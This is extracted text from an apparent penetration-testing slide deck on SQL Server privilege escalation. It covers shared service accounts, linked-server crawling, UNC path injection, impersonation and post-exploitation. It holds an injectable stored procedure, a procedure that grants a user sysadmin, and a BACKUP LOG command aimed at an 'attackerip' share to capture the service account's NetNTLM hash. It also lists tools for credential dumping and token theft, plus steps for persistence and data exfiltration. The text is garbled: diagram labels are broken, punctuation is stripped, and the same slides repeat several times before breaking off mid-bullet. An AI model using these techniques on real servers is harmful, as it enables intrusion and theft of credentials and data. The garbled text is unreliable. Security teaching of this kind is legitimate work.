Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
